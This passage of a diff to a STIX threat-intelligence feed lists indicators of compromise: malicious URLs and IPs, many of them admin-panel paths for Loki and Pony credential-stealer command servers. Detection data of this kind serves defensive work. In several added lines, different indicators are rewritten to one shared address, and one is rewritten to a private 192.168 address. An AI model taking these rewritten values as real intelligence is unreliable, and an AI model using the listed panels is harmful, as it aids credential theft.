http://94.100.18.4/primfive/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.4/primfive/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.052Z"} +{"created":"2020-02-22T02:54:51.052Z","description":"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-22T02:54:51.052Z","name":"mal_url: http://89.160.20.156/primfive/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/primfive/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.052Z"} {"created":"2020-02-22T02:54:51.08Z","description":"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:51.08Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.08Z"} {"created":"2020-02-22T02:54:57.998Z","description":"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-22T02:54:57.998Z","name":"mal_url: http://dronius267.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dronius267.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:57.998Z"} {"created":"2020-02-22T02:54:58.082Z","description":"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-22T02:54:58.082Z","name":"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:54:58.082Z"} -{"created":"2020-02-22T02:54:59.268Z","description":"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-22T02:54:59.268Z","name":"mal_url: http://193.142.59.88/primsix/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.88/primsix/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.268Z"} +{"created":"2020-02-22T02:54:59.268Z","description":"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-22T02:54:59.268Z","name":"mal_url: http://89.160.20.156/primsix/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/primsix/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.268Z"} {"created":"2020-02-22T02:54:59.71Z","description":"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:54:59.71Z","name":"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.71Z"} {"created":"2020-02-22T02:55:06.175Z","description":"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:06.175Z","name":"mal_url: http://nortonlilly.info/jp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jp/login.php']","type":"indicator","valid_from":"2020-02-22T02:55:06.175Z"} {"created":"2020-02-22T02:55:16.703Z","description":"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:16.703Z","name":"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:16.703Z"} {"created":"2020-02-22T02:55:26.13Z","description":"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-45"],"modified":"2020-02-22T02:55:26.13Z","name":"mal_url: http://67.215.224.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.144/login']","type":"indicator","valid_from":"2020-02-22T02:55:26.13Z"} {"created":"2020-02-22T02:55:32.068Z","description":"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-22T02:55:32.068Z","name":"mal_url: http://abyng.com/mg/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://abyng.com/mg/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:32.068Z"} -{"created":"2020-02-22T02:55:34.073Z","description":"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:34.073Z","name":"mal_ip: 192.64.118.182","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.182']","type":"indicator","valid_from":"2020-02-22T02:55:34.073Z"} -{"created":"2020-02-22T02:55:37.882Z","description":"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-22T02:55:37.882Z","name":"mal_ip: 185.141.24.100","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.141.24.100']","type":"indicator","valid_from":"2020-02-22T02:55:37.882Z"} +{"created":"2020-02-22T02:55:34.073Z","description":"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:34.073Z","name":"mal_ip: 192.168.118.182","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.168.118.182']","type":"indicator","valid_from":"2020-02-22T02:55:34.073Z"} +{"created":"2020-02-22T02:55:37.882Z","description":"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-22T02:55:37.882Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-22T02:55:37.882Z"} {"created":"2020-02-22T02:55:50.468Z","description":"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-22T02:55:50.468Z","name":"mal_url: http://d0lphin1337.xyz/autofarm/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:50.468Z"} {"created":"2020-02-22T02:55:52.759Z","description":"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:52.759Z","name":"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:52.759Z"} -{"created":"2020-02-23T02:51:55.106Z","description":"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--516caba2-8889-4f32-96e6-e4874a705085","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:51:55.106Z","name":"mal_url: http://94.100.18.11/plugman/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.11/plugman/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.106Z"} +{"created":"2020-02-23T02:51:55.106Z","description":"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--516caba2-8889-4f32-96e6-e4874a705085","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:51:55.106Z","name":"mal_url: http://89.160.20.156/plugman/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/plugman/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.106Z"} {"created":"2020-02-23T02:51:55.126Z","description":"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime","id":"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-100"],"modified":"2020-02-23T02:51:55.126Z","name":"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.126Z"} {"created":"2020-02-23T02:52:00.436Z","description":"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--015e9665-1524-4e79-841d-8038961e0250","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:52:00.436Z","name":"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:00.436Z"} {"created":"2020-02-23T02:52:11.479Z","description":"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:52:11.479Z","name":"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:11.479Z"} @@ -564,7 +564,7 @@ {"created":"2020-02-23T02:53:12.354Z","description":"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:53:12.354Z","name":"mal_url: http://f0405230.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0405230.xsph.ru/login']","type":"indicator","valid_from":"2020-02-23T02:53:12.354Z"} {"created":"2020-02-23T02:53:17.566Z","description":"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:53:17.566Z","name":"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:17.566Z"} {"created":"2020-02-23T02:53:19.805Z","description":"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ebf656cd-162d-40e8-8c3a-272285600583","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:53:19.805Z","name":"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:19.805Z"} -{"created":"2020-02-23T02:53:27.698Z","description":"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-23T02:53:27.698Z","name":"mal_url: http://193.142.59.109/primone/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.109/primone/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.698Z"} +{"created":"2020-02-23T02:53:27.698Z","description":"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-23T02:53:27.698Z","name":"mal_url: http://89.160.20.156/primone/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/primone/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.698Z"} {"created":"2020-02-23T02:53:27.735Z","description":"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ff626727-4888-4cba-9257-470f0a70891a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:27.735Z","name":"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.735Z"} {"created":"2020-02-23T02:53:40.401Z","description":"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:40.401Z","name":"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.401Z"} {"created":"2020-02-23T02:53:40.432Z","description":"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9d14574f-9af7-493d-84a2-f631570f1940","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-23T02:53:40.432Z","name":"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.432Z"} @@ -577,14 +577,14 @@ {"created":"2020-02-23T02:54:09.172Z","description":"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:09.172Z","name":"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:09.172Z"} {"created":"2020-02-23T02:54:15.807Z","description":"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--27b834b0-4113-4eca-8989-d7ada85d0779","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:15.807Z","name":"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:15.807Z"} {"created":"2020-02-23T02:54:17.76Z","description":"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--56334c71-2f84-4e09-a6cc-017577b99970","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:17.76Z","name":"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:17.76Z"} -{"created":"2020-02-23T02:54:19.374Z","description":"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:19.374Z","name":"mal_ip: 162.144.13.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.13.146']","type":"indicator","valid_from":"2020-02-23T02:54:19.374Z"} +{"created":"2020-02-23T02:54:19.374Z","description":"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:19.374Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-23T02:54:19.374Z"} {"created":"2020-02-23T02:54:25.477Z","description":"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--8b4fe873-9b07-4985-9818-291623fc07b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-23T02:54:25.477Z","name":"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:25.477Z"} {"created":"2020-02-23T02:54:39.696Z","description":"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:39.696Z","name":"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.696Z"} {"created":"2020-02-23T02:54:39.976Z","description":"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0748270e-f010-4598-a389-553d3fffcb48","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:39.976Z","name":"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.976Z"} -{"created":"2020-02-23T02:54:40.035Z","description":"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-23T02:54:40.035Z","name":"mal_ip: 202.67.10.173","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '202.67.10.173']","type":"indicator","valid_from":"2020-02-23T02:54:40.035Z"} +{"created":"2020-02-23T02:54:40.035Z","description":"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-23T02:54:40.035Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-23T02:54:40.035Z"} {"created":"2020-02-23T02:54:40.281Z","description":"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:54:40.281Z","name":"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:40.281Z"} -{"created":"2020-02-23T02:54:48.232Z","description":"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-23T02:54:48.232Z","name":"mal_ip: 50.116.87.108","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '50.116.87.108']","type":"indicator","valid_from":"2020-02-23T02:54:48.232Z"} -{"created":"2020-02-23T02:54:53.263Z","description":"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:53.263Z","name":"mal_url: http://193.142.59.96/africa/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.96/africa/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:54:53.263Z"} +{"created":"2020-02-23T02:54:48.232Z","description":"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-23T02:54:48.232Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-23T02:54:48.232Z"} +{"created":"2020-02-23T02:54:53.263Z","description":"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:53.263Z","name":"mal_url: http://89.160.20.156/africa/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/africa/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:54:53.263Z"} {"created":"2020-02-23T02:54:54.071Z","description":"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:54.071Z","name":"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:54.071Z"} {"created":"2020-02-23T02:55:00.871Z","description":"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:55:00.871Z","name":"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.871Z"} {"created":"2020-02-23T02:55:00.907Z","description":"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:55:00.907Z","name":"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 